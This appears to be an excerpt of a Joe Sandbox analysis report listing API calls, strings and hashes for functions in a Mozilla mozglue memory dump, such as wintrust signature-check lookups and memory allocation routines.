                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67308), ref: 6BA90178
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6BA90197
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA67308), ref: 6BA901AE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-3354427110
                                                                                                                                                                                                                                      • Opcode ID: 295066d765b10c5cd32b89b943e29ac959c6049cd217d22242977672977e4120
                                                                                                                                                                                                                                      • Instruction ID: b5bd8502b64a464b7d3158be4c8b5a42fe45063e34753d4637c7702300d86965
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 295066d765b10c5cd32b89b943e29ac959c6049cd217d22242977672977e4120
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02E09A755883059FEF506F65D908B0A7BF8B786781F54C16FE98482380DF7AC082DA22
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67204), ref: 6BA90088
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6BA900A7
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA67204), ref: 6BA900BE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-3385133079
                                                                                                                                                                                                                                      • Opcode ID: 7d04cb19d08fc1993756838d4c48068691f30d9605ed669db4a5130275e21d40
                                                                                                                                                                                                                                      • Instruction ID: 3163acb4f0ba3f892da5f3fa8a79ad21734805ebddb48a49342095bf9e02afc7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d04cb19d08fc1993756838d4c48068691f30d9605ed669db4a5130275e21d40
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4E09A74548305ABEF106F65A81875A7BE8BB8B781F44C12DE954C2254DF7AC082EB12
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67235), ref: 6BA900D8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6BA900F7
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA67235), ref: 6BA9010E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6BA900F1
                                                                                                                                                                                                                                      • wintrust.dll, xrefs: 6BA900D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-2559046807
                                                                                                                                                                                                                                      • Opcode ID: ba436a0ac0272682f1d43cc16a7cf8fe6ba76a41a9ff3eb9b83bcec3f1950d05
                                                                                                                                                                                                                                      • Instruction ID: 5164e09b797fc7959c12a99d327b1207000feb0277c3d9fb9b5bf0f860da263f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba436a0ac0272682f1d43cc16a7cf8fe6ba76a41a9ff3eb9b83bcec3f1950d05
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2E04F7428C3059BEF006F25D90972A3BF8A783641F54C03EA94882240DF7AC082DB12
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernelbase.dll,?,6BA605BC), ref: 6BABBAB8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6BABBAD7
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA605BC), ref: 6BABBAEC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: VirtualAlloc2$kernelbase.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-1188699709
                                                                                                                                                                                                                                      • Opcode ID: 7830ff7dbc2a53d5a6325e7ffc75e9853b285919dceb07097b795cbe1e03c5aa
                                                                                                                                                                                                                                      • Instruction ID: 082ee8f8272deb20a7f7f2631342d8704b50cd6c02c0062a03286a66badc6128
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7830ff7dbc2a53d5a6325e7ffc75e9853b285919dceb07097b795cbe1e03c5aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FE0BF705093419BDF005F62C95874A7BF8E786205F94C12DE914C2340EFBAC1468B11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BA677C5), ref: 6BABC298
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6BABC2B7
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA677C5), ref: 6BABC2CC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • CryptCATAdminCalcHashFromFileHandle, xrefs: 6BABC2B1
                                                                                                                                                                                                                                      • wintrust.dll, xrefs: 6BABC293
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-1423897460
                                                                                                                                                                                                                                      • Opcode ID: 3937b972bd7e1bcdb8bb4cdef17e8c15710a06abfeb1811feac64fef4ee6535e
                                                                                                                                                                                                                                      • Instruction ID: 342e23b604fd3783f3b4c22eb354a7130b9896103b0803fcfbbb5e074b992f9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3937b972bd7e1bcdb8bb4cdef17e8c15710a06abfeb1811feac64fef4ee6535e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AE09A745493019FDF006B69890870B7BE8FB86205F88812EA95482350EB76C152CA51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BA677F6), ref: 6BABC248
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6BABC267
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BA677F6), ref: 6BABC27C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-3357690181
                                                                                                                                                                                                                                      • Opcode ID: 4de253fbf4bc628f6f45ae38df198f330def6d293bd30049254a3d7da0f4555f
                                                                                                                                                                                                                                      • Instruction ID: 8e1c374634f69a99fcda648d9a23f3266de5876e155c1ef1a7f9e29dbf36c7c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4de253fbf4bc628f6f45ae38df198f330def6d293bd30049254a3d7da0f4555f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34E09A745083019BDF046F659808B4A7EE8AB8B305F50C16DE954C3340EB76C0829B52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6BABC1DE,?,00000000,?,00000000,?,6BA6779F), ref: 6BABC1F8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6BABC217
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6BABC1DE,?,00000000,?,00000000,?,6BA6779F), ref: 6BABC22C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-2991032369
                                                                                                                                                                                                                                      • Opcode ID: e155b09571cfe1add585a92f7069f9857aa920eec421b8aa9a4442837d443729
                                                                                                                                                                                                                                      • Instruction ID: db1b818daf3750a4e263de0c6f6da5867c26233a69b3b4124bdfdbf417adff4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e155b09571cfe1add585a92f7069f9857aa920eec421b8aa9a4442837d443729
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE09A7450A3819FDF007B658D08B0B7EE8BB86605F48822DA95482345EB76C0428B52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BA660F4
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BA66180
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BA66211
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BA66229
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BA6625E
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BA66271
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                                      • Opcode ID: 22ff85365e9c182f4e453aaf97768e787acac9f27e5bf43e243117bda99522e2
                                                                                                                                                                                                                                      • Instruction ID: 46ca5e866fe51a919e32f196da265a82c3f81504541b9103eed5cfc9fadaa83b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22ff85365e9c182f4e453aaf97768e787acac9f27e5bf43e243117bda99522e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C5169F1A042068BEF14CF6CD8807AAB7B5EF45388F144439C616DB351F739AA95CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6BA65820,?), ref: 6BA9D21F
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,6BA65820,?), ref: 6BA9D22E
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6BA65820,?), ref: 6BA9D242
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,6BA65820,?), ref: 6BA9D253
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6BA65820,?), ref: 6BA9D280
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029485308-0
                                                                                                                                                                                                                                      • Opcode ID: 8b85cdbd7aba23336e2b0bb5740e8bd6721720fe41c62fd5d6e22954897e9aa7
                                                                                                                                                                                                                                      • Instruction ID: 7c9bb5b83d7809787a21a304856016766073d404da0d475ed7227127970381eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b85cdbd7aba23336e2b0bb5740e8bd6721720fe41c62fd5d6e22954897e9aa7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7310AB5940215AFCF00DF68D480A6EBBB5FF89744F284069D9546B341D37AE8C2CBE1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6BA6C1BC
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA6C1DC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1885715127-0
                                                                                                                                                                                                                                      • Opcode ID: 4fd1eea4acb1bde06ba062c1b449ff13bcd03eb234529b78b575c9f126d86027
                                                                                                                                                                                                                                      • Instruction ID: ee3c8cce63e52128d5f707c2c8e535c9277ec4d89329427e89b8df78258c1d2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fd1eea4acb1bde06ba062c1b449ff13bcd03eb234529b78b575c9f126d86027
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D41BFB1D083409FDB20DF38C58175AB7E4BF86744F44896EE8989B212F738D588CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF770), ref: 6BABA858
                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BABA87B
                                                                                                                                                                                                                                        • Part of subcall function 6BABA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6BABA88F,00000000), ref: 6BABA9F1
                                                                                                                                                                                                                                      • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6BABA8FF
                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BABA90C
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF770), ref: 6BABA97E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1355178011-0
                                                                                                                                                                                                                                      • Opcode ID: 032e0136f22e54f5df6d9f15f43292f8e1e43c3c6fa44a101f61b0611a775eb7
                                                                                                                                                                                                                                      • Instruction ID: 4264c90ef1b13405e0cd706393e9f672450415986960d5e5aa642afaff41e3e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 032e0136f22e54f5df6d9f15f43292f8e1e43c3c6fa44a101f61b0611a775eb7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 444174B4D002089FDF00DFA8D845BDEBB75FF44324F148619E866AB391EB799981CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000010,?,6BA542D2), ref: 6BA5436A
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?,?,?,6BA542D2), ref: 6BA54387
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(80000023,?,6BA542D2), ref: 6BA543B7
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6BA542D2), ref: 6BA543EF
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BA542D2), ref: 6BA54406
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2563754823-0
                                                                                                                                                                                                                                      • Opcode ID: 6a3279f65980834c367e8e83462c4a4a186f77dc8c8a5751db50ccb2e5d11723
                                                                                                                                                                                                                                      • Instruction ID: 4ab77130f0528c9c1b06d7d2a4ff8b678ea4c2ecfe5f038c6b60bf9a85a7fe19
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a3279f65980834c367e8e83462c4a4a186f77dc8c8a5751db50ccb2e5d11723
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA312973A041159FDF14DE799C8056EB7A6EF40270B140639E815CB398EF34EAB08392
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BBC
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67
